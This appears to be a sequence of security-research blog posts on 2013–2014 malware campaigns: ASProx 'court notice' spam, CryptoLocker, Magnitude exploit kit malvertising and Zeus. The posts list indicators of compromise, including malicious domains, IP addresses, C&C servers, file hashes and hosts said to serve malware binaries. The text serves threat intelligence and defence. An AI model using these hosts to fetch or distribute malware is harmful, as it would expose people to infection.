hokkoku-cs.co.jp
holmeswf.it
homewiredandwireless.com
hondenkapperijmazzel.nl
hoofdtoren.nl
hoogglansspray.nl
hortifrut.com.ar
hostingacela.com
hotel-heigerhof.de
hotellequerce.it
hotsia.com
hotstonerelax.nl
housecoating-takayama.com
hoveniersbedrijfveere.nl
hr-solutions.pl
i.walmartimages.com
iconicalcreative.com
idvpistoia.it
ienova.com
ifb-bernhard.at
igl-netto.de
iic-corporation.com
ikastpedersen.dk
imajthailand.com
imediak.de
imenkadeh.com
impiantioleari.it
infostart.it
infostudio.org
ingomoegling.de
ini-europe.com
in-kom.com
integrityperiod.net
interakces.com.pl
interior.de
intermet.it
interweavecorp.com
intlead.ru
iphometech.com
iphone5bestellen.net
iridewheelies.com
iso17025handbuch.de
isoftenterprise.com
it2simplify.de
italcaseimmobiliare.eu
itathomegroup.com
iwmpyashada.in
iz5ilj.it
jamesroke.co.uk
jappoo-nrw.de
jdkjaslo.pl
jelte.nl
jeuxprizee.com
jmwdesign.nl
jobsearchsimplified.com
joemahonedrummer.com
johndeereoldtimers.com
jojama.nl
jonasnovello.com
jonkers-en-juffers.nl
joomla15.guru99.com
joomla3.guru99.com
jordanhomesmn.com
joyful-miniaussies.nl
j-rs.com
judithvandevecht.nl
julienblog.com
justlikedreams.com
justthrift.com
kaitoweb.com
kalinkinhill.com
kaolincentre.com.ua
kastelsbroodje.be
katglobal.in
kaufhaus-myklick.de
khoandph01081.tk
khuyenhoccham.com
kimupvc.com
kinderopvangnatuurlijk.nl
kingstarsm.com
kirschner-sonthofen.de
kitesurfschool.co.za
kmg.hobbit.seedboxes.cc
knightsbridgestudenthousing.com
komproweb.nl
kongres.pgri.or.id
koreanspa.lk
koshiki.nl
kowalewskiczarter.pl
kranendijk-domotica.nl
kreuzhuber.de
krishwellness.com
kromkesim.com
kursimakan.info
kursitamu.info
kvs-centr.com.ua
labelsexchange.ca
lafotografa.net
lapetito.cz
larredabene.com
laurenfrances.com
lavidayogabodyworks.com
ldkgroup.eu
ledmateriaal.nl
lee-kleimann.de
leerkrachtbegeleiding.nl
lema-cad.de
lesavto.ru
letreros-abc.cl
lightingretrofit.com.au
lilyzhang.net
livredesignrio.com.br
losbailongos.es
lovesdoor.org
lowerheidelbergtownship.org
lucas-av.com
luger-genesis.com
lummysoft.com
maasukraine.com.ua
macora.tv
madamebloem.nl
madsnow.ru
magentoconnect.us
mainlinemedical.com
mamonia-club.com
manliodeangeli.it
marcelldev.nl
markazisport.ir
marketingandsupport.com
markhalwani.com
marokko-ferien.de
marriageselite.com
masseriabaronia.it
matius.net
mayahuel.info
mcatransportation.com
media-aetas.de
media-industries.nl
megashoes.com.ua
memorialmustangs.com
menya-marugen.com
merflemunchies.com
merkx-mook.nl
methodistfamily.com
mftqs.com
michaelbadura.net
michelsweb.nl
mijnbieshaar.nl
minamargroup.com
minasvale.com.br
minuscity.ru
miriam-strehlau.com
mixpromocionales.com
mobifrit.be
modumorientering.no
molecularmotors.org
mon-arch.com.ua
mondart.net
monkeyinthecage.com
monster-rock.com
montanaflowergirls.com
mooibeautyandwellness.nl
mooigelukt.nl
mootstudio.mx
mops-greta.de
mortgage-rates-refinancing.com
mostly3d.com
mpacreative.co.uk
mrcollection.com
mrfancyplantsnursery.com
msmarketintel.com
mvcf.dreamhosters.com
mvcfmaster.com
mybloodfirst.com
nakyb.com
nancydsolomon.com
nanogate.co.uk
naturex.lt
naunhofer-wohnbau.de
nawazone.com
nayaraspa.com
nederlandoutdoor.nl
needhamcab.com
nepal-himalaya-trekking.de
nesslerfamily.com
netscripter.org
new.free-dom.by
newelementgaming.net
neweranewplan.com
newhanovergardens.com
newstylezone.com
nhasachphuongdong.com
nickmudge.info
nipponboard.com
nododono.com
norcalcompetitivesports.com
northgateanimalclinic.com
noval.cl
novinhosdobrasil.com.br
noworriesit.net
nrgservice.ru
nudiism.com
nujit.com
nur-celik.com
nushaba.ru
nysalons.com
nystormnyc.com
odeaannemer.nl
odessa-live.ru
offertedelmomento.it
olense-truckersvrienden.be
oliehandeltwente.nl
omsinchan.ac.th
onetelenet.co.uk
online-planning.eu
opportunityspinner.com
optimosapto.com
optiontradingnewsletter.com
oreda.nl
organicfoodtown.com
ortalsoft.com
oshoppingtv.com
otm-corp.com
otudo.ru
owingen-coudoux.de
ows-winespirits.com
pafrock.de
palswebservice.com
paoloverrecchia.it
papironi.com
patatfriet.com
pavlab.com
pcmcalibrators.com
pcs-network.de
peaceofmind.com.pl
penumbrasolutions.com
petr.ilgner.cz
photo2canvasdirect.com
pimhesse.nl
pinkdiamondconsulting.com
pixelonnet.de
piyamaku.com
planet-intv.com
pn-kotamobagu.info
podiodemo.aalilaa.com
pokojegoscinnekarpacz.pl
polarcol.com
polkphotography.net
polluxautos.nl
ponorogozone.com
porncontent.nl
pornoholigans.com
pratabong.com
pravoslavie-hristianstvo.ru
prazdnik-doma.by
preventia.nl
priroda.by
profilaktica.tv
profi-poz.pl
proschild24.com
pryozerne.com
puertaselectricasof.com
quranrazavi.ir
radomir.lt
redwineevents.biz
rik-design.ru
rockzulte.be
rondomhetpark.nl
salsacursussen.nl
scienceofsailing.info
sheltiesvombuchenweg.de
shikmodern.by
shotredes.com
slotoking.com
smartwebarchitect.be
snoeppotten.nl
sobob.org
standbouwmateriaal.nl
sterconsultancy.nl
stnw.nl
tauer.pl
tk-simvol.ru
topsticker.nl
tr-edv.info
ufakupon.ru
usethis.ru
versinamsterdam.nl
vibocenter.nl
voet-fit.nl
webmasterkursu.net
webwinkelprijsvergelijk.nl
wellingtonaugusto.com
xamb.nl
yellow-bricks.de
yfk-web.jp
zachtfruit.nl
zakenkantoorvancauwenberghe.be
zeltlager-amelsbueren.de

Update -- the following destination domains seen on December 27th & December 28th.

           machine           
-----------------------------
 ahbrownlibrary.org
 asu-student.com
 e-quit.co.uk
 garageviaene.be
 hameleon76.ru
 magentoconnect.us
 nederlandoutdoor.nl
 newelementgaming.net
 nospammer.net
 otm-corp.com
 pratabong.com
 pruebas.tasoge.es
 radomir.lt
 ralf-willms.eu
 rbook.ir
 recycling-zukunft.de
 reinhard-jaeger.de
 reklametataneon.com
 retailunitglasgow.co.uk
 revistaxtreme.com
 rezalighting.com
 ribalka100.ru
 rik-design.ru
 rnpadvisory.com
 robwa.nl
 rockinspain.es
 rocksonjohn.com
 rockymtneventcenter.com
 rockzulte.be
 roes-vermessung.de
 romarkmarble.com
 ronachhuettli.ch
 rondomhetpark.nl
 rork.lpipl.com
 rosdeutschland.de
 rosfrance.fr
 ros-hungary.hu
 ros-romania.ro
 rossbach-onkes.de
 ros-schweiz.ch
 rozasalesconsultancy.nl
 rri-berlin.de
 rudyenkarolien.nl
 ruschke-wilfling.de
 russelmanagement.com
 rweis.com
 rwtb-schneesport.de
 ryoh.com
 salon-cuna.net
 salsacursussen.nl
 sankinhdoanh.vn
 sardanet.org
 saskiakusters.nl
 satin-solutions.de
 satorilinens.com
 sattinfo.kz
 saturntechnolabs.com
 savakovacevic.rs
 saw-eishockeycamp.de
 scala-rijopleiding.nl
 scandalltypess.com
 sccschmeligk.com
 scharenborg.nl
 schmetterling-ev.de
 schnaase.de
 schottland-reisen.at
 schottranch.com
 schreibschwung.de
 schylgefoto.nl
 scienceofsailing.info
 scribbleballard.com
 sealservice.nl
 SECWAY.PT
 seiungakuin.com
 selmo-honmoku.com
 sen-sei.nl
 sentimentrecords.com
 sequoyahregionallibrary.org
 setarip.com
 sgelettronica.it
 shampooink.com
 shekarkhand.ir
 shikmodern.by
 shineyouththeatre.com
 shootingfairytales.be
 shopdiversant.com
 shopzippers.com
 shotredes.com
 shufflerror.com
 simantabnews.com
 simonebertolotti.it
 singflut-burghaun.de
 sitoo.nl
 sklauctions.com
 skm.lt
 slm-kunststofftechnik.de
 smaakkeuken.tv
 sma-amersfoort.nl
 smartwebarchitect.be
 smilelandtravel.com
 smilenews.org
 sms-silvestergruesse.de
 snoeppotten.nl
 snowwhiteweddings.nl
 sobob.org
 socialapp.in
 solardynamicsinc.com
 solutions-imprimees.net
 solvam.es
 soolz.nl
 soomtech.evisionegypt.com
 sortirenfauteuil.com
 souburgh.nl
 soudomundo.es
 sounddreamradio2007.de
 spaghetti-casa.de
 spb-dctec.ru
 spireplayschool.co.uk
 splinterville.com
 spoekes.eu
 spoker.ro
 sportwelt-verlag.de
 spotfx.com
 standbouwmateriaal.nl
 stanislav-glazar.si
 starbene.it
 starthelpfoundation.org
 startmenu.nl
 staug.org
 sterconsultancy.nl
 sterre.fr
 st-exupery.be
 stnw.nl
 strandhousestmarys.com
 strandoase.de
 strokersex.com
 stscpeduc.ph
 studio-fantasy.de
 subway-uae.com
 sunoil-biodiesel.com
 sunucuhizmetleri.net
 superiorsecurity.org
 swim.intersectmg.com
 swing-sport.com
 szantai.hu
 www.mailscanner.info
 www.transtec.co.uk
(147 rows)

Court-related malware from ASProx

Update - new version of malware December 27th @6:15AM. see bottom

So far, there have been 9 different malware samples distributed by this campaign, which began on December 23rd at approximately 7:45 AM (US Central Time GMT -6)

Here are the relative distributions of each, where the first number is the number of spam samples collected in the Malcovery Security Spam Data Mine. The second column is the domain name used, the third is the MD5 of the .zip attachment, and lastly, in 15 minute increments, the first and last time period in which spam bearing this attachment was seen.

Email subjects with counts for JonesDay were:

5050 of Subject: Urgent court notice NR#
4738 of Subject: Hearing of your case in Court NR#
4150 of Subject: Notice of appearance in court NR#
3640 of Subject: Notice to appear in court NR#

Email subjects with counts for Latham Watkins were:

1477 of Subject: Urgent court notice No#
1319 of Subject: Hearing of your case in Court No#
1251 of Subject: Notice of appearance in court No#
1110 of Subject: Notice to appear in court No#

Email subjects with counts for Hogan Lovells were:

1785 of Subject: Urgent court notice WA#
1615 of Subject: Hearing of your case in Court WA#
1547 of Subject: Notice of appearance in court WA#
1334 of Subject: Notice to appear in court WA#

Email subjects with counts for McDermett Will and Emery were:

1172 of Subject: Urgent court notice CH#
1009 of Subject: Hearing of your case in Court CH#
962 of Subject: Notice of appearance in court CH#
838 of Subject: Notice to appear in court CH#

My "442e7" jonesday sample is: Court_Notice_Jones_Day_Wa#3358.zip which contains the file "Court_Notice_Jones_Day_Washington.exe" with an internal timestamp of 12/23/2013 5:24 PM and a size of 121,344 bytes and an MD5 of 6933c76f0fbabae32d9ed9275aa60899.

VirusTotal says? 33 of 48.

My "267d9" jonesday sample is Court_Notice_Jones_Day_Wa#8877.zip which contains the file "Court_Notice_Jones_Day__Washington.exe" with an internal timestamp of 12/23/2013 8:40 PM and a size of 123,904 bytes and an MD5 of 84fae8803a2fcba2d5f868644cb55dd6.

VirusTotal says? 35 of 48. Please note that seven of the AV's correctly identify this as Kuluoz while some call it DoFoil, and one of the majors calls it "FakeAVLock". (This malware does NOT act like a Fake anti-virus, and does not lock your computer.

My "b2f8e5" Latham & Watkins sample is: Court_Notice_Latham_and_Watkins___NY88756.zip which contains the file "Court_Notice_Latham_and_Watkins__New_York.exe" with an internal timestamp of 12/24/2013 5:13PM 123,904 bytes in size and an MD5 of ac572ca741df1bbcc88183e27e7fce6c.

VirusTotal says? 34 of 48. After 2 days and 19 hours since first submission.

My "30336" Hogan & Lovells sample is: Court_Notice_Hogan_Lovells_WA29377.zip which contains the file "Court_Notice_Hogan_Lovells_WA_Washington.exe" with an internal timestamp of 12/25/2013 05:05 PM and 167,936 bytes in size and an MD5 of ebcb90d14904d596531fc8989c057f40.

VirusTotal says? 26 of 48 We still have one group calling it Zeus and one FakeAVLock. It's been on VT for 1 day and 12 hours at this point.

My "f9779" H&L sample is: Court_Notice_Hogan_Lovells_WA34711.zip which contains the file "Court_Notice_Hogan_Lovells_WA_Washington.exe" with an internal timestamp of 12/25/2013 9:42 AM and 167,936 bytes in size and an MD5 of bd4255eacbf47649570c58061d81f018.

VirusTotal says? 25 of 48.

And now the ones from today. My "d181a" sample from MWE is Court_Notice_Chicago_CN83259.zip which contains the file "Court_Notice_Chicago_McDermott_Will_and_Emery.exe" with an internal timestamp of 12/26/2013 at 12:41 PM and a size of 163,328 bytes and an MD5 of 225b15d05fe6f5d24d23b426fcfd7a2d.

VirusTotal says? 21 of 45 .

And the most recent sample from MWE, "7c572", is Court_Notice_Chicago_CN56910.zip which contains the file Court_Notice_McDermott_Will_and_Emery.exe with a timestamp of 12/26/2013 at 7:33 PM and a size of 163,328 bytes and an MD5 of c77ca2486d1517b511973ad1c923bb7d.

VirusTotal says? 21 of 46.

The AV Question

The media will repeat a massive lie about anti-virus technology. I predict that in 2014 every major newspaper and magazine will perpetuate, to the detriment of data security and human understanding, the grossly erroneous notion that “for an anti-virus firm to spot malware, it first needs to have seen the malware, recognized that it’s malicious code, and written a corresponding virus signature for its products.”

He goes on to say that anyone who believes that Anti-Virus has to develop a signature in order to detect malware would be similar to Car & Driver magazine assuming that automobiles must still be starting by turning a crank at the front of the car. The problem is, Stephen is wrong.

On day one of the "Court" version of this Kuluoz malware, would you like to see what the detection rate was of the malware that is now "33 of 48" on VirusTotal? Here's a clip from the Malcovery Security "Today's Top Threat" report for that day, which featured the "JonesDay" version of the malware mentioned above.

In that report, Malcovery malware analyst Brendan Griffin points out that beginning at 7:45 that morning we had seen 167 spam messages from this campaign in a single 15 minute period with the volume hitting 8932 messages by 2 PM.

The problem, of course, was that at 2 PM, only FOUR of the 48 Anti-virus products were detecting the malware as being something bad that should be blocked. Here's the VirusTotal report showing 4 of 47 detects at the time of Malcovery's report. Note the MD5's and assure yourself it is the same one that, three days later, is showing 33 of 48 above.

But wait! Didn't Mr. Cobb assure us that anti-virus products now detect malware in many clever ways that don't rely on writing signatures? Perhaps they do, but they certainly weren't doing it on this sample. I'm not sure which heuristic was supposed to be protecting us as we successfully infected ourselves and watched our traffic flow to the C&C server at 91.227.4.27 on port 8080. I certainly agree that AV products should always be installed "in the suite" of security protections. Hostile URLs should be blocked, but the problem is that in a great many cases, no one is blocking anything. We *DID* report our C&C server's URL to URLQuery.net, who assured us there was nothing malicious going on there (See URLQuery report for 91.227.4.27). We also noted that the spam we were receiving was from IP addresses that were not being blocked by reputation at the beginning of this campaign, though later a good many of them were.

I told Graham that when I saw his headline "The Massive Lie about Anti-Virus" I was assuming it was THE OTHER massive lie. The one where we tell consumers, "please make sure you let your AV update itself automatically and everything will be ok!"

Updated - December 27, 2013 @ 6:15 AM Central time

The zip file is 195db522bfbf399ec4f89455e9f05088. My sample was named Court_Notice_Jones_Day_Wa#4677.zip which contained the exe file Court_Notice_Jones_Day__Washington.exe which is 162,816 bytes in size and had an internal timestamp of 12/27/2013 08:52 AM. The .exe has an MD5 of 48e4b1e322e7c5fd53b6745e8b2409e6. VirusTotal is reported 12 of 46 detection rate.

46.149.111.28, 62.76.45.1, 83.69.233.25, 83.69.233.176, 95.59.26.43,
95.172.146.68, 109.234.154.254, 188.65.211.137, 188.120.255.37, 195.2.77.48

A CryptoLocker walk-through

The AT&T email had an attached .zip file named VoiceMail.zip which was 8,810 bytes in size and had the MD5 be7d2f4179d6d57827a18a20996a5a42. When unpacked, the included .exe file, VoiceMail.exe, was 15,872 bytes in size and had the MD5 d1ca2dc1b6d1c8b32665fcfa36be810b. At the time of the report, the only VirusTotal detections for that piece of malware were 5 of 49, with most major AV companies failing to detect.

VirusTotal Report 5 of 49

The downloaded Zeus sample, wav.exe had an MD5 of a4bdb44128ca8ee0159f1de3cf11bee0 and was also very poorly detected. The VirusTotal report at that time showed only 8 of 49 detections. Of the major US-based AV, McAfee and TrendMicro detected it, both confirming a Zeus variant.

VirusTotal Report 8 of 49 detects

Immediately after becoming infected with the GameOver version of Zeus, the machine downloaded cryptolocker malware from another site.

VirusTotal 1 of 49.

CryptoLocker

#1. This was the first screen that we saw after infection, letting us know we needed to pay a $300 ransom if we anted to decrypt our files.

#2. Our Windows wallpaper was replaced with this image, so we couldn't miss the fact that we were infected.

#3. There was a pull-down menu that gave us two choices of how we wanted to pay. The first choice was to pay 0.6 BitCoins.

#4. This is the BitCoin Account we were supposed to send our money to. We would appreciate anyone else who is infected sending out a tweet with the hashtag "#CryptoBitCoin" letting us know which BitCoin purse you were supposed to send payment to.

#5. We're trying to learn more about the option to pay with a GreenDot MoneyPak. Although we tried to make a payment this way, two valid MoneyPak's that we tried to send were rejected.

CryptoLocker & IID

Malcovery Security's daily "Today's Top Threat" reports share details about the top spam campaigns that are distributing malware. Recipients of the T3 reports would have been provided with all of the IP addresses, MD5s, and VirusTotal reports above as part of this report:

As happens in so many cases, the IP address warned about in this report provides lasting protection, as the same IP was used for CryptoLocker from that day forward. But were there other IP addresses involved as well?

Because Malcovery Security is a partner with Internet Identity, we ran the IP against their Passive DNS Database. IID's President Rod Rasmussen and Threat Intelligence VP Paul Ferguson gave us permission to share some of what we learned there.

CryptoLocker Domains found on 188.65.211.137

As we examine the NAMESERVER choices on the domains above, we can use the Passive DNS service to find other IP addresses that use some of the same Nameservers.

The fact that at various times this DNS server, known to be associated with CryptoLocker Domain Generation Algorithm-created Domain names, has been seen on these IP addresses makes these IP addresses of interest. But does it look like they are hosting CryptoLocker Domains as well as the DNS? We used the IID Passive DNS to find lists of domain names hosted on these various IP addresses, and then checked to see whether they were used for Technical Support *OR* for distribution of Binaries associated with the CryptoLocker malware. Let's look at what we found!

Our original IP address, 188.65.211.137, was very frequently associated with spam domains related to "Ruby Casino" a criminally operated online gaming service. The IID Passive DNS service showed us dozens of "Ruby" related domains on many of these other domains as well. For each of the other IP addresses, we'll ask

- was a CryptoLocker TechSupport website found on this IP?
- was evidence of CryptoLocker Malware found on this IP?
- was this IP used by Ruby Casino spam domains?

On 188.65.211.137 - aemivjtujaddhab.org - Positive for CryptoLocker TechSupport!
Confirmed (VT 40/48) CryptoLocker malware = mgkppyunffvvd.org file at /0388.exe!
Confirmed Ruby Casino domains!

On 109.234.154.254 - yxmbwneyurhxfv.org - Positive for CryptoLocker TechSupport!
Confirmed CryptoLocker malware = jingo-deny-hosting.com file at /0388.exe
Previously used for Fake AV - see 0x3a blog post on Fake AV
Many Ruby Casino domains, such as arubylifeclub.com, erubylifeclub.com, irubylifeclub.com.

On 188.20.255.37 - aemivjtujaddhab.org - Dec 28, 2013 - Positive for CryptoLocker!
Same binary (0388.exe) available here.
No Ruby Casino

On 195.2.77.48 - usyusdoctfpnee.org - most CryptoLocker prior to December 6th.
Hosted malware on "AdobeFlasherUp1.com" on October 31, 2013.
Many Ruby Casino domains, including zrubywinclub.com and orubywinclub.com.

On 46.149.111.28 (Ukraine) - wwfcogdgntlxw.biz - most CryptoLocker prior to December 3rd.
Confirmed to have hosted Cryptolocker binary on November 21, 2013.
Many Ruby Casino domains, including lrubystardream.com and orubywindream.com.

On 62.76.45.1 - teeusgcggvys.biz - confirmed CryptoLocker on December 29th.
0388.exe binary available at IP or domain level.
Many Ruby Casino domains, including yrubyeurodream.com and zrubyeurodream.com

(194.28.174.119), linked by IID Passive DNS based on common Ruby Casino domains on the previous IP address, was found to be actively hosting CryptoLocker Domains found here on October 30th confirmed to be CryptoLocker by our friends at Malware Must Die, including kwajtnjddqetolh.biz. The most recent Crypto look alike was from December 10th. ukyfkufdi7ytdfuit.ru.

83.69.233.176 - mdaodtaifpkqkk.org - confirmed CryptoLocker domain on December 27th
. This IP has not been seen prior to December 27th.

83.69.233.25 - not confirmed as CryptoLocker by passive DNS.
This IP *WAS* declared to be CryptoLocker in a new paper from Dell Secureworks' Keith Jarvis, more below.

95.172.146.68 - mdaodtaifpkqkk.org - confirmed CryptoLocker domain on December 29th
. Also hosted the AdobeFlasherUp1.com domain mentioned above.
Hosted several Ruby Casino domains, including rubypowerland.com and krubywindream.com

95.59.26.43 - dozens of CryptoLocker domains - confirmed TechSupport domains live on December 29th
0388.exe binary available on live domains, including ooqgdlwctrpt.org
Hosted several Ruby Casino domains, including rubystarsland.com, krubymasterclub.com and others.

1 Dec lbmuvpwgcmquc.org
1 Dec jknuotworuebip.org
3 Dec usyusdoctfpnee.org
3 Dec msncwipuqpxxoqa.org
5 Dec yebdbfsomgdbqu.biz
5 Dec pkakvsexbmxpwxw.org
5 Dec dhjicdgfykqoq.org
5 Dec wjbodchhlgidofm.org
5 Dec ghvoersorwsrgef.org
5 Dec rttvxygkmwlqmq.net
5 Dec wwfcogdgntlxw.biz
6 Dec bsngfunwcpkjt.org
6 Dec tmphandchtcnffy.org
7 Dec qnsoiclrikwj.org
7 Dec nfnfskbniyajd.org
7 Dec swmbolrxyflhwm.biz
7 Dec agwwcjhinwyl.org
7 Dec osmhvqijsiedt.org
7 Dec cmidahhutlcx.org
7 Dec emttankkwhqsoe.org
9 Dec ormyfnlykajkdr.org
9 Dec ypxnqheckgjkbu.org
10 Dec vsjotulrsjhyf.org
10 Dec kmjqcsfxnyeuo.org
10 Dec cpapfioutwypmh.org
10 Dec xivexnrjahpfk.org
10 Dec ukyfkufdi7ytdfuit.ru
10 Dec www.qnsoiclrikwj.org
10 Dec www.jxjyndpaoofctm.com
11 Dec slbugcihgrgny.org
11 Dec ykmccdhpgavm.org
11 Dec wpowcdntgoye.org
11 Dec gavhopncgfmdq.org
12 Dec rkmmrxbpafgnplt.org
12 Dec fpvpnoqmgntmc.org
13 Dec mqagyenfbebsau.org
13 Dec ahqnsclgckkpho.org
13 Dec urkitujgkhsjl.org
14 Dec kgvmmylyflrqml.org
16 Dec shjeyrqelevega.org
16 Dec ohmfbedvtftg.org
16 Dec rldrrlcakwnumbe.org
16 Dec hgfcqopaylrvyht.org
18 Dec wxntojirxraawe.org
18 Dec jlbrdhtbkmhkryk.org
18 Dec rwmhbmtauqgyhcqhizinljirjr.org
18 Dec pdfaayxydaqpyrouwrkydmneu.org
18 Dec qplmkjrolbvc.org
18 Dec mdaodtaifpkqkk.org
19 Dec lnxbofsriihe.org
20 Dec mpcljoupkkipyl.org
20 Dec cuxsdtynsyml.org
20 Dec oxgufearvtqkwh.org
20 Dec jnptslhlsqise.org
23 Dec pqulnjwedvbpm.org
23 Dec vcbetblhrykeyxv.biz
24 Dec omeidojwwtmalsy.biz
24 Dec huqenkdqtoatvnc.biz
24 Dec klufixwglgyb.biz
24 Dec wwrahwrdcfhygp.org
24 Dec wnjoalurtgqpd.biz
24 Dec uwelewosqoirmt.org
26 Dec yxmbwneyurhxfv.org
26 Dec mgkppyunffvvd.org
27 Dec teeusgcggvys.biz
27 Dec ooqgdlwctrpt.org
28 Dec fsihpjionkbb.net
28 Dec bsgxxguicafc.org
28 Dec aemivjtujaddhab.org
28 Dec iwgymewvnfpyveg.org
28 Dec dryadsncyghpyx.org

The same Dell Secureworks paper made me aware of the excellent thesis BitIodine: Extracting Intelligence from the Bitcoin Network by Michele Spagnuolo.

The famous "DNS Changer" case that was featured on the FBI's website in the story Case against Internet fraud ring reveals millions unknowingly affected worldwide actually began when criminals were using such malicious ads to push Fake Antivirus malware to a variety of high profile websites, including the New York Times, which explained its own breach in this September 2009 story, Advertising - On the Web, Ads Can Be a Security Hole.

In the current Yahoo campaign, it was the excellent researchers at Fox-IT in the Netherlands who broke the news. Their story, Malicious advertisements served via Yahoo showed some key information about what was going on.

One very important difference between what you are hearing on the news and reality ... NO ONE HAD TO CLICK the ads in order to be infected. Because the ads displayed an "IFRAME" which caused a REDIRECT to be executed, simply having the ad displayed in your JavaScript aware browser was enough to cause the Exploit Kit to be visited. Over 300,000 computers per hour were visiting the Exploit kit, and roughly 11% of them, 27,000 per hour, were actually infected with malware as a result of the visit. These are very acceptable numbers in the malware distribution world. (visit and infection rates based on Fox-IT's analysis of the destination server hosted in the Netherlands.)

Basically, some of the advertisements that appeared through Yahoo's ad network contained an IFRAME. An IFRAME is an HTML command that says "go get some content from this OTHER website, and display it as part of what is being shown here." According to Fox's article, some of the domains where the IFRAMEs were hosted included:

• blistartoncom.org (192.133.137.59), registered on 1 Jan 2014
• slaponitkons.net (192.133.137.100), registered on 1 Jan 2014
• origina-filmsonline.com (192.133.137.63)
• funnyboobsonline.org (192.133.137.247)
• yagerass.org (192.133.137.56)

Magnitude Exploit Kit

One reason to believe that Magnitude may dominate this space is to look at where known cybercriminals moved their goods after the demise of BlackHole Exploit Kit. BlackHole was actually one of TWO Exploit Kits run by Paunch. The "premium" Exploit Kit was called "Cool EK" and delivered zero-day (0-day) exploits that were not publicly available anywhere else. After the zero-days became publicly disclosed, Paunch would push those exploits to the lower cost and more common BlackHole Exploit Kit. The primary buyers of the Cool EK throughout the summer were the criminals behind Reveton, which was also known as "Police Lock Ransomware".

One of the early uses of the Magnitude EK was disclosed on the website "kahusecurity", in their article Deobfuscating Magnitude Exploit Kit. The analysis shows that Magnitude was pushing very new Zero-day exploits, and more interestingly, the end-game of the infection was to install the Reveton PoliceLock Exploit Kit!

(Click image to visit the KahuSecurity report on Magnitude EK)

This is also not the first time that the Magnitude Exploit Kit has been associated with a high-profile website "drive-by infection". Our friend Fabio Assolini, of Kaspersky Security, confirmed that PHP.net, the official website of PHP, was actually injected with a malicious iframe that pointed to the Magnitude Exploit Kit and infected visitors with the Tepfer Trojan (which is better known in some circles as Papras). Here's his tweet (thanks to KahuSecurity for the link):

Other great analysis links for understanding Magnitude EK include:

• Kaffeine's blog "MalwareDon'tNeedCoffee" -- Magnitude EK: Pop! Pop! (March 2013! Kaffeine ahead of us all!)
• Dell SecureWorks's blog -- Cutwail Spam Swapping Blackhole for Magnitude
• ProofPoint's ThreatInsight post -- Paunch Arrest May Mean Magnitude Exploit Kit is the New Blackhole

Magnitude used in ADP Spam

Check Your Logs for . . .

• boxsdiscussing.net
• crisisreverse.net
• limitingbeyond.net
• and others

Based on some research that I've done in the Internet Identity Passive DNS Research platform, I was able to find those names ... here are some examples:

201214.yqs.lucd.ici.ptwd.ivntyzjdlzuk.boxsdiscussing.net
201211.ef.ivntyzjdlzuk.boxsdiscussing.net
201116.vbnf.mkr.ovei.zza.cgu.ivntyzjdlzuk.boxsdiscussing.net
201214.rcfg.bgy.tej.veae.juv.ivntyzjdlzuk.boxsdiscussing.net
201311.leo.dx.ivntyzjdlzuk.boxsdiscussing.net
201115.fe.srqe.sbisakxivel.boxsdiscussing.net
2018.xfi.eah.mhi.sbisakxivel.boxsdiscussing.net
201311.zn.sbisakxivel.boxsdiscussing.net
201216.ehp.sbisakxivel.boxsdiscussing.net
201216.rmji.kjm.hrp.xpex.sbisakxivel.boxsdiscussing.net
201115.obw.wx.sbisakxivel.boxsdiscussing.net
201116.bomw.tswi.vpzy.ir.kqdy.sbisakxivel.boxsdiscussing.net

201311.qw.wvtj.cb.eveourvczt.crisisreverse.net
201311.hrph.sqee.zo.eveourvczt.crisisreverse.net
201118.bfcq.eveourvczt.crisisreverse.net
201116.sp.xdq.xwgt.vqna.ms.eveourvczt.crisisreverse.net
201311.zjn.ejh.rws.hwhd.twiurmgmvw.crisisreverse.net
201116.zllf.zj.lbz.be.twiurmgmvw.crisisreverse.net
201216.udi.wke.twiurmgmvw.crisisreverse.net
201311.nez.uj.kbwc.atk.pbgu.twiurmgmvw.crisisreverse.net
201214.quqc.gm.rf.we.tg.fmpryuyqoz.crisisreverse.net
201311.mak.fmpryuyqoz.crisisreverse.net
201311.nsm.fmpryuyqoz.crisisreverse.net
201311.zm.fmpryuyqoz.crisisreverse.net
201115.ysw.fmpryuyqoz.crisisreverse.net

201115.eoju.zqlj.ze.tt.cmxf.paftwtdqc.limitingbeyond.net
201116.pg.paftwtdqc.limitingbeyond.net
201115.pz.rbnq.rwg.paftwtdqc.limitingbeyond.net
201210.xm.sym.paftwtdqc.limitingbeyond.net
201111.bao.paftwtdqc.limitingbeyond.net
201116.wi.tdc.xgx.jfuo.paftwtdqc.limitingbeyond.net
201514.pbcp.paftwtdqc.limitingbeyond.net
201214.aeo.nwfn.cbpz.efs.paftwtdqc.limitingbeyond.net
201216.yjg.ynnu.paftwtdqc.limitingbeyond.net
201210.yu.paftwtdqc.limitingbeyond.net
201116.jy.ek.tma.fuiv.paftwtdqc.limitingbeyond.net
201116.fo.hea.dyu.wqi.cnsw.paftwtdqc.limitingbeyond.net
201514.fwsj.qygk.dmd.bia.vhy.paftwtdqc.limitingbeyond.net
201214.nsnz.paftwtdqc.limitingbeyond.net

• boxsdiscussing.net
• chapterwild.net
• crisisreverse.net
• elsecommenting.net
• farmtrains.net
• federalpoet.net
• irritatedpound.net
• layfriend.net
• liechecks.net
• limitingbeyond.net
• suggestsfilm.net

• 201311.koha.uue.vwm.swp.cfmg.buosehgr.boxsdiscussing.net
• 201311.et.ck.fsc.gjwa.dh.acirtcbrjmcm.chapterwild.net
• 201116.sp.xdq.xwgt.vqna.ms.eveourvczt.crisisreverse.net
• 201214.ups.xwo.jrw.hoy.bmm.bhzoahcvhbv.elsecommenting.net
• 201210.kyy.qfw.qji.lg.agw.douvcaghuuh.farmtrains.net
• 201214.lu.oqkt.vu.qfmw.xsyn.gjsjixxiskxe.federalpoet.net
• 201116.ivfi.pmar.vv.hw.fvyg.aicnkapom.irritatedpound.net
• 201116.gp.hnpd.lwp.nv.aj.armlnjjyot.layfriend.net
• 201210.uzb.cavs.bqkw.kpou.cwp.blenzspz.liechecks.net
• 201210.bigc.opt.jcov.widl.hpv.duohlqzrzqw.limitingbeyond.net
• 201116.jjia.wo.nmf.chl.sog.gvkqjqvzf.suggestsfilm.net

Fox-IT illustrates the Infection Flow

Small brands in Zeus

While Zeus captures pretty much all userids and passwords, it can be tuned to pay special attention to certain banks by setting a list of URL Substrings in a place on your computer that will compare them to anything being visited by your browser. If you visit one of these "targeted" strings, Zeus might be instructed to send the criminal screenshots every time you click your mouse, to send the criminal all of the contents of your web forms, or even trigger to ask you for your Two Factor Authentication. We can learn about what the criminals are targeting by grabbing those URL Substrings out of memory and comparing them to URL Substrings we've seen in other instances of Zeus.

